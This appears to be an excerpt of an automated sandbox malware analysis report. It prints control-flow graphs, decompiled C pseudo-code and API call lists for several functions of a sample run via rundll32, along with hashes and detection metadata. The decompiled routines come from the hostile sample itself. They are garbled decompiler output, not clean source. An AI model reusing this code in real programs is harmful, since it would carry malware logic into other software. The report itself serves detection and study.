                                • Opcode ID: 722e2f74ef2c31bf3a87772954c185508aa39493c954e4f7debf6ce3318dd27c
                                • Instruction ID: 67377f72cfdd7a367e87164e7516d7cc60517aeed0e2426a57f022b489b42e4f
                                • Opcode Fuzzy Hash: 722e2f74ef2c31bf3a87772954c185508aa39493c954e4f7debf6ce3318dd27c
                                • Instruction Fuzzy Hash: 64F0D4786022409FF7209F69E948B1E7BA8EBE4780B458418F506D6261D72AFC82DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A42F70, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 303 4a42f70-4a42f8b call 4a459a4 306 4a42fa1-4a42faf 303->306 307 4a42f8d-4a42f9b 303->307 309 4a42fc1-4a42fdc call 4a42b6f 306->309 310 4a42fb1-4a42fb4 306->310 307->306 316 4a42fe6 309->316 317 4a42fde-4a42fe4 309->317 310->309 311 4a42fb6-4a42fbb 310->311 311->309 313 4a43142 311->313 315 4a43144-4a4314a 313->315 318 4a42fec-4a43001 call 4a49154 call 4a48e0d 316->318 317->318 323 4a43003-4a43006 CloseHandle 318->323 324 4a4300c-4a43011 318->324 323->324 325 4a43037-4a4304f call 4a41525 324->325 326 4a43013-4a43018 324->326 335 4a43051-4a43079 memset RtlInitializeCriticalSection 325->335 336 4a4307b-4a4307d 325->336 327 4a4312e-4a43132 326->327 328 4a4301e 326->328 330 4a43134-4a43138 327->330 331 4a4313a-4a43140 327->331 332 4a43021-4a43030 call 4a48b7b 328->332 330->315 330->331 331->315 341 4a43032 332->341 339 4a4307e-4a43082 335->339 336->339 339->327 340 4a43088-4a4309e RtlAllocateHeap 339->340 342 4a430a0-4a430cc wsprintfA 340->342 343 4a430ce-4a430d0 340->343 341->327 344 4a430d1-4a430d5 342->344 343->344 344->327 345 4a430d7-4a430f7 call 4a47a2e call 4a47fbe 344->345 345->327 350 4a430f9-4a43100 call 4a450e8 345->350 353 4a43107-4a4310e 350->353 354 4a43102-4a43105 350->354 355 4a43110-4a43112 353->355 356 4a43123-4a43127 call 4a47c3d 353->356 354->327 355->327 358 4a43114-4a43121 call 4a446b2 355->358 360 4a4312c 356->360 358->327 358->356 360->327
                                C-Code - Quality: 57%
                                			E04A42F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04A459A4();
				if(_t21 != 0) {
					_t59 =  *0x4a4d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4a4d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4a4d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04A42B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4a4d2a8; // 0x40a5a8
					if( *0x4a4d25c > 5) {
						_t8 = _t26 + 0x4a4e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4a4e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04A49154(_t27, _t27);
					_t31 = E04A48E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x4a4d270 =  *0x4a4d270 ^ 0x81bbe65d;
						_t32 = E04A41525(0x60);
						 *0x4a4d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4a4d32c; // 0x4e595b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4a4d32c; // 0x4e595b0
							 *_t51 = 0x4a4e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4a4d238, 0, 0x43);
							 *0x4a4d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4a4d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4a4d2a8; // 0x40a5a8
								_t13 = _t58 + 0x4a4e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4a4c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04A47A2E( ~_v8 &  *0x4a4d270,  &E04A4D00C); // executed
								_t42 = E04A47FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04A450E8(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04A47C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04A446B2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4a4d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E04A48B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                0x04a42f70
                                0x04a42f7b
                                0x04a42f7e
                                0x04a42f81
                                0x04a42f84
                                0x04a42f8b
                                0x04a42f8d
                                0x04a42f99
                                0x04a42f9b
                                0x04a42f9b
                                0x04a42fa4
                                0x04a42faa
                                0x04a42faf
                                0x04a42fc9
                                0x04a42fd5
                                0x04a42fd7
                                0x04a42fdc
                                0x04a42fe6
                                0x04a42fe6
                                0x04a42fde
                                0x04a42fde
                                0x04a42fde
                                0x04a42fde
                                0x04a42fed
                                0x04a42ffa
                                0x04a43001
                                0x04a43006
                                0x04a43006
                                0x04a4300e
                                0x04a43011
                                0x04a43037
                                0x04a43043
                                0x04a43048
                                0x04a4304d
                                0x04a4304f
                                0x04a4307b
                                0x04a4307d
                                0x04a43051
                                0x04a43055
                                0x04a4305a
                                0x04a4305f
                                0x04a43066
                                0x04a4306c
                                0x04a43071
                                0x04a43077
                                0x04a4307e
                                0x04a43080
                                0x04a43082
                                0x04a43091
                                0x04a43097
                                0x04a4309c
                                0x04a4309e
                                0x04a430ce
                                0x04a430d0
                                0x04a430a0
                                0x04a430a0
                                0x04a430a6
                                0x04a430b3
                                0x04a430b9
                                0x04a430b9
                                0x04a430c1
                                0x04a430ca
                                0x04a430d1
                                0x04a430d3
                                0x04a430d5
                                0x04a430dc
                                0x04a430e9
                                0x04a430ee
                                0x04a430f3
                                0x04a430f5
                                0x04a430f7
                                0x00000000
                                0x00000000
                                0x04a430f9
                                0x04a430fe
                                0x04a43100
                                0x04a43107
                                0x04a4310b
                                0x04a4310e
                                0x04a43123
                                0x04a43127
                                0x04a4312c
                                0x00000000
                                0x04a4312c
                                0x04a43110
                                0x04a43112
                                0x00000000
                                0x00000000
                                0x04a4311d
                                0x04a4311f
                                0x04a43121
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a43121
                                0x04a43104
                                0x04a43104
                                0x04a430d5
                                0x04a43013
                                0x04a43013
                                0x04a43018
                                0x04a4312e
                                0x04a43132
                                0x04a4313a
                                0x04a4313a
                                0x00000000
                                0x04a43132
                                0x04a4301e
                                0x04a43021
                                0x04a4302b
                                0x04a43032
                                0x00000000
                                0x04a43142
                                0x04a43142
                                0x04a43146
                                0x04a4314a
                                0x04a4314a

                                APIs
                                  • Part of subcall function 04A459A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,04A42F89,00000000,00000000), ref: 04A459B3
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04A43006
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • memset.NTDLL ref: 04A43055
                                • RtlInitializeCriticalSection.NTDLL(04E59570), ref: 04A43066
                                  • Part of subcall function 04A446B2: memset.NTDLL ref: 04A446C7
                                  • Part of subcall function 04A446B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04A44709
                                  • Part of subcall function 04A446B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04A44714
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04A43091
                                • wsprintfA.USER32 ref: 04A430C1
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 3a4b500664144e171288e4e2fb8935faa382278224c969f9b46266fd9db369ec
                                • Instruction ID: 1c5bfc98491554389c22ed2535c46c4435cafbe70472f879e23760f0dce4f7ab
                                • Opcode Fuzzy Hash: 3a4b500664144e171288e4e2fb8935faa382278224c969f9b46266fd9db369ec
                                • Instruction Fuzzy Hash: 9D51C479B02214ABFF21AFB9D884B6E77B8EBC4714F104455E901EB140E779F945CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A42D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 362 4a42d74-4a42da1 call 4a41525 365 4a42ef5-4a42ef7 362->365 366 4a42da7-4a42dad 362->366 368 4a42ef8-4a42efe 365->368 367 4a42daf-4a42db3 366->367 369 4a42db5-4a42db7 367->369 370 4a42dfb-4a42dfd 367->370 373 4a42de1-4a42de3 369->373 374 4a42db9-4a42dbb 369->374 371 4a42dff-4a42e02 370->371 372 4a42e0a-4a42e0e 370->372 377 4a42e04 371->377 378 4a42e07 371->378 380 4a42e14-4a42e2c call 4a41525 372->380 381 4a42ee8 372->381 375 4a42de5-4a42de8 373->375 376 4a42df2 373->376 374->373 379 4a42dbd-4a42dbf 374->379 382 4a42ded-4a42df0 375->382 383 4a42dea 375->383 384 4a42df5-4a42df9 376->384 377->378 378->372 386 4a42dc1-4a42dc3 379->386 387 4a42dde-4a42ddf 379->387 395 4a42ee4-4a42ee6 380->395 396 4a42e32-4a42e42 380->396 385 4a42eea 381->385 382->376 383->382 384->367 384->370 389 4a42eeb-4a42ef3 call 4a48b22 385->389 386->372 390 4a42dc5-4a42dd6 386->390 387->384 389->368 393 4a42dd8 390->393 394 4a42ddb-4a42ddd 390->394 393->394 394->387 395->385 398 4a42e48 396->398 399 4a42eda-4a42ee2 396->399 400 4a42e4d-4a42e94 lstrcpy lstrcat 398->400 399->389 401 4a42e96-4a42ea5 lstrcmp 400->401 402 4a42eb7-4a42ed4 lstrlen 400->402 403 4a42eb4 401->403 404 4a42ea7-4a42eb0 401->404 402->399 402->400 403->402 404->401 405 4a42eb2 404->405 405->402
                                C-Code - Quality: 22%
                                			E04A42D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04A41525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04A48B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04A41525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x4a4d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x04a42d7b
                                0x04a42d82
                                0x04a42d87
                                0x04a42d8a
                                0x04a42d91
                                0x04a42d94
                                0x04a42d97
                                0x04a42d9c
                                0x04a42da1
                                0x04a42ef5
                                0x04a42ef7
                                0x04a42ef9
                                0x04a42efe
                                0x04a42efe
                                0x04a42da7
                                0x04a42daa
                                0x04a42dad
                                0x04a42daf
                                0x04a42daf
                                0x04a42db3
                                0x00000000
                                0x00000000
                                0x04a42db7
                                0x04a42de3
                                0x04a42de8
                                0x04a42dea
                                0x04a42dea
                                0x04a42ded
                                0x04a42df0
                                0x04a42df0
                                0x04a42df2
                                0x00000000
                                0x04a42dbd
                                0x04a42dbf
                                0x04a42dde
                                0x04a42dde
                                0x04a42df5
                                0x04a42df5
                                0x04a42df6
                                0x04a42df6
                                0x04a42df9
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a42df9
                                0x04a42dc3
                                0x04a42e0a
                                0x04a42e0e
                                0x04a42ee8
                                0x04a42eea
                                0x04a42eea
                                0x04a42eeb
                                0x04a42eee
                                0x00000000
                                0x04a42eee
                                0x04a42e17
                                0x04a42e28
                                0x04a42e2c
                                0x04a42ee4
                                0x00000000
                                0x04a42ee4
                                0x04a42e32
                                0x04a42e35
                                0x04a42e39
                                0x04a42e3d
                                0x04a42e42
                                0x04a42eda
                                0x04a42eda
                                0x00000000
                                0x04a42ee0
                                0x04a42e4d
                                0x04a42e56
                                0x04a42e6a
                                0x04a42e71
                                0x04a42e86
                                0x04a42e8c
                                0x04a42e94
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a42e96
                                0x04a42e96
                                0x04a42e96
                                0x04a42e9d
                                0x04a42ea5
                                0x00000000
                                0x00000000
                                0x04a42ea7
                                0x04a42eb0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a42eb2
                                0x04a42eb4
                                0x04a42eb7
                                0x04a42eb7
                                0x04a42eba
                                0x04a42ebe
                                0x04a42ec1
                                0x04a42ec7
                                0x04a42eca
                                0x04a42ed1
                                0x00000000
                                0x04a42e4d
                                0x04a42dc8
                                0x04a42dd0
                                0x04a42dd6
                                0x04a42dd8
                                0x04a42dd8
                                0x04a42ddb
                                0x04a42ddd
                                0x00000000
                                0x04a42ddd
                                0x04a42db7
                                0x04a42dfd
                                0x04a42e02
                                0x04a42e04
                                0x04a42e04
                                0x04a42e07
                                0x04a42e07
                                0x00000000

                                APIs
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04A42E71
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 04A42E86
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04A42E9D
                                • lstrlen.KERNEL32(69B25F45), ref: 04A42EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 562aa7d925e8c17d4dad870ddaaa2ae3ead97ddc30909caf0dcee2f37e5578fe
                                • Instruction ID: 4da40499127b6874dd6a1aec7bda53043afe7897c8f99bd95625dd85cef6c439
                                • Opcode Fuzzy Hash: 562aa7d925e8c17d4dad870ddaaa2ae3ead97ddc30909caf0dcee2f37e5578fe
                                • Instruction Fuzzy Hash: 1751AF32A00118EBDB21CF99C8857ADBBB5FFD5395F15809AF8159B241C771BB42DB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A45319, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A45319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04A4155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4a4d2a8; // 0x40a5a8
				_t4 = _t24 + 0x4a4edc0; // 0x4e59368
				_t5 = _t24 + 0x4a4ed68; // 0x4f0053
				_t26 = E04A45D79( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4a4d2a8; // 0x40a5a8
						_t11 = _t32 + 0x4a4edb4; // 0x4e5935c
						_t48 = _t11;
						_t12 = _t32 + 0x4a4ed68; // 0x4f0053
						_t52 = E04A4272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x4a4d2a8; // 0x40a5a8
							_t13 = _t35 + 0x4a4edfe; // 0x30314549
							_t37 = E04A45B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x4a4d25c - 6;
								if( *0x4a4d25c <= 6) {
									_t42 =  *0x4a4d2a8; // 0x40a5a8
									_t15 = _t42 + 0x4a4ec0a; // 0x52384549
									E04A45B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x4a4d2a8; // 0x40a5a8
							_t17 = _t38 + 0x4a4edf8; // 0x4e593a0
							_t18 = _t38 + 0x4a4edd0; // 0x680043
							_t40 = E04A44538(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x4a4d238, 0, _t52);
						}
					}
					HeapFree( *0x4a4d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04A44FF0(_t54);
				}
				return _t45;
			}




















                                0x04a45319
                                0x04a45329
                                0x04a4532c
                                0x04a45333
                                0x04a45335
                                0x04a45335
                                0x04a45338
                                0x04a4533d
                                0x04a45344
                                0x04a45351
                                0x04a45356
                                0x04a4535a
                                0x04a45368
                                0x04a45376
                                0x04a4537a
                                0x04a4540b
                                0x04a4540b
                                0x04a45380
                                0x04a45380
                                0x04a45385
                                0x04a45385
                                0x04a4538c
                                0x04a45398
                                0x04a4539a
                                0x04a4539c
                                0x04a4539e
                                0x04a453a5
                                0x04a453b0
                                0x04a453b7
                                0x04a453b9
                                0x04a453c0
                                0x04a453c2
                                0x04a453c9
                                0x04a453d4
                                0x04a453d4
                                0x04a453c0
                                0x04a453d9
                                0x04a453de
                                0x04a453e5
                                0x04a453f5
                                0x04a45403
                                0x04a45405
                                0x04a45405
                                0x04a4539c
                                0x04a45417
                                0x04a45417
                                0x04a45419
                                0x04a4541e
                                0x04a45420
                                0x04a45420
                                0x04a4542b

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E59368,00000000,?,74E5F710,00000000,74E5F730), ref: 04A45368
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E593A0,?,00000000,30314549,00000014,004F0053,04E5935C), ref: 04A45405
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04A47CCB), ref: 04A45417
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 845d9cf8943cd323eb8e89f52bd610d13ecb01252f9bca05b97e64922cd51a5b
                                • Instruction ID: c764b3ea70108d6babe3dfba41d3999480bf39241442bc9e51f21c0b1cc77452
                                • Opcode Fuzzy Hash: 845d9cf8943cd323eb8e89f52bd610d13ecb01252f9bca05b97e64922cd51a5b
                                • Instruction Fuzzy Hash: 9D317C36900118FFEB11EF94DD84E9EBBBDEBD8704F114165E600AB160D7B1AE45DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A42C58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E04A42C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x4a4d340; // 0x4e59b20
				_push(0x800);
				_push(0);
				_push( *0x4a4d238);
				if( *0x4a4d24c >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x4a4d24c =  *0x4a4d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04A42C0D(_t44, _t40);
						_t18 = E04A431A8(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x4a4d24c < 5) {
								 *0x4a4d24c =  *0x4a4d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E04A45433();
						HeapFree( *0x4a4d238, 0, _t40);
						goto L10;
					}
					_t24 = E04A49BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E04A45450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}












                                0x04a42c58
                                0x04a42c58
                                0x04a42c5b
                                0x04a42c5c
                                0x04a42c66
                                0x04a42c6d
                                0x04a42c72
                                0x04a42c74
                                0x04a42c7a
                                0x04a42c9a
                                0x04a42ca2
                                0x04a42cba
                                0x04a42cbc
                                0x04a42cbd
                                0x04a42cbf
                                0x04a42cfd
                                0x04a42cfd
                                0x04a42d03
                                0x04a42d09
                                0x04a42d09
                                0x04a42cc1
                                0x04a42cc7
                                0x04a42cca
                                0x04a42cd9
                                0x04a42cdb
                                0x04a42ce2
                                0x04a42d16
                                0x04a42d1b
                                0x04a42d1d
                                0x04a42d1f
                                0x04a42d1f
                                0x00000000
                                0x04a42d1d
                                0x04a42ce4
                                0x04a42ce9
                                0x04a42cf7
                                0x00000000
                                0x04a42cf7
                                0x04a42cb1
                                0x04a42cb6
                                0x04a42cb6
                                0x00000000
                                0x04a42cb6
                                0x04a42c84
                                0x00000000
                                0x00000000
                                0x04a42c93
                                0x00000000

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 04A42C7C
                                  • Part of subcall function 04A45450: GetTickCount.KERNEL32 ref: 04A45464
                                  • Part of subcall function 04A45450: wsprintfA.USER32 ref: 04A454B4
                                  • Part of subcall function 04A45450: wsprintfA.USER32 ref: 04A454D1
                                  • Part of subcall function 04A45450: wsprintfA.USER32 ref: 04A454FD
                                  • Part of subcall function 04A45450: HeapFree.KERNEL32(00000000,?), ref: 04A4550F
                                  • Part of subcall function 04A45450: wsprintfA.USER32 ref: 04A45530
                                  • Part of subcall function 04A45450: HeapFree.KERNEL32(00000000,?), ref: 04A45540
                                  • Part of subcall function 04A45450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A4556E
                                  • Part of subcall function 04A45450: GetTickCount.KERNEL32 ref: 04A4557F
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 04A42C9A
                                • HeapFree.KERNEL32(00000000,00000002,04A47D16,?,04A47D16,00000002,?,?,04A4312C,?), ref: 04A42CF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                • String ID: Ut
                                • API String ID: 1676223858-8415677
                                • Opcode ID: ee7ab267e7769a3816906a95b87a7b5be6b20fff26647f3a359b2f03cc87e109
                                • Instruction ID: e1274d283b231011f5170d483a1e5731a03e50b57eb3de84cf7d720715ba33b4
                                • Opcode Fuzzy Hash: ee7ab267e7769a3816906a95b87a7b5be6b20fff26647f3a359b2f03cc87e109
                                • Instruction Fuzzy Hash: 17217C7A201204ABEB119F59E880F9E3BACEBD8395F104066F902DB250DB75ED019BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A48A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04A48A76
